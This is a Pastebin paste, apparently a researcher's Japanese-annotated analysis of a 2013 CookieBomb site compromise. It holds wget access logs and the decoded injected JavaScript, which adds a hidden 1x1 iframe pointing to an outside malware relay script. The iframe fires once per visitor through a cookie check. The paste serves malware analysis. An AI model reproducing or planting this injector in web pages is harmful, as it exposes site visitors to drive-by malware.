Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // CookieBombインジェクションに感染されたサイトのアクセスログ...
- --2013-07-15 16:57:36-- hxxp://www.antjapan.co.jp/catalog/
- Resolving www.antjapan.co.jp... 211.10.17.56
- Caching www.antjapan.co.jp => 211.10.17.56
- Connecting to www.antjapan.co.jp|211.10.17.56|:80... connected.
- :
- GET /catalog/ HTTP/1.1
- Host: www.antjapan.co.jp
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Mon, 15 Jul 2013 07:55:25 GMT
- Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
- X-Powered-By: PHP/4.4.4
- Set-Cookie: osCsid=e1c9ded7019391417e944b64b8cbf1a4; path=/catalog
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Keep-Alive: timeout=10, max=128
- Connection: Keep-Alive
- Transfer-Encoding: chunked
- Content-Type: text/html; charset=EUC-JP
- 200 OK
- :
- Length: unspecified [text/html]
- Saving to: ‘index.html’
- 2013-07-15 16:57:36 (200 KB/s) - ‘index.html’ saved [4959]
- // index.htmlにオOCJP-112のマルウェア感染コードを発見しました。
- // decodeすると...
- function zzzfff(){
- var h = document.createElement('iframe');
- h.src = 'hxxp://www.verdaedevelopment.com/_js/relay.php';
- h.style.position = 'absolute';
- h.style.border = '0';
- h.style.height = '1px';
- h.style.width = '1px';
- h.style.left = '1px';
- h.style.top = '1px';
- if (!document.getElementById('h')){
- document.write('<div id=\'h\'></div>');
- document.getElementById('h').appendChild(h);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path){
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0)nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
- toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name){
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))){
- return null;
- }
- if (start == - 1)return null;
- var end = document.cookie.indexOf(";", len);
- if (end == - 1)end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled){
- if (GetCookie('visited_uq') == 55){
- }
- else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
- // マルウェアのリンクをフォローすると....
- --2013-07-15 17:06:16-- hxxp://www.verdaedevelopment.com/_js/relay.php
- Resolving www.verdaedevelopment.com... 174.120.172.123
- Caching www.verdaedevelopment.com => 174.120.172.123
- Connecting to www.verdaedevelopment.com|174.120.172.123|:80... connected.
- :
- GET /_js/relay.php HTTP/1.1
- Referer: http://www.antjapan.co.jp/catalog/
- Host: www.verdaedevelopment.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Mon, 15 Jul 2013 08:04:06 GMT
- Server: Apache
- Keep-Alive: timeout=5, max=75
- Connection: Keep-Alive
- Transfer-Encoding: chunked
- Content-Type: text/html
- 200 OK
- Length: unspecified [text/html]
- Saving to: ‘relay.php’
- 2013-07-15 17:06:17 (20.8 KB/s) - ‘relay.php’ saved [2]
- // 「relay.php」はマルウェア転送スクリプトで、条件/タイミングが合わないと「ok」などの回答が出る。
- $ cat relay.php
- ok
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement